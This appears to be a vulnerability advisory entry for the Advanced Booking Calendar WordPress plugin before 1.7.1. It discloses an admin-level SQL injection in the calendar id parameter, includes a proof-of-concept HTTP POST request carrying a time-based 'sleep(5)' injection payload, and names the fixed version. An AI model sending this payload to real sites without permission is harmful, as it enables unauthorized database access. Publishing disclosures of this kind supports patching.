WordPress Plugin Vulnerabilities
Advanced Booking Calendar < 1.7.1 - Admin+ SQLi
Description
The plugin does not sanitise and escape the id parameter when editing Calendars, which could allow high privilege users such as admin to perform SQL injection attacks
Proof of Concept
Edit an existing Seasons & Calendars (/wp-admin/admin.php?page=advanced-booking-calendar-show-seasons-calendars) and tamper the id parameter POST /wp-admin/admin-post.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 163 Origin: http://192.168.9.32 Connection: close Cookie: [admin+] Upgrade-Insecure-Requests: 1 action=abc_booking_editCalendar&id=1+and+sleep(5)&name=test&maxAvailabilities=1&maxUnits=5&pricePreset=9000&minimumStayPreset=1&partlyBooked=1&page_id=0&infotext=
Affects Plugins
Fixed in version 1.7.1
References
Classification
Miscellaneous
Original Researcher
YICHENG LIU-ZTE CHENFENG lab
Submitter
YICHENG LIU-ZTE CHENFENG lab
Verified
Yes
Timeline
Publicly Published
2022-03-21 (about 4 months ago)
Added
2022-03-21 (about 4 months ago)
Last Updated
2022-04-11 (about 4 months ago)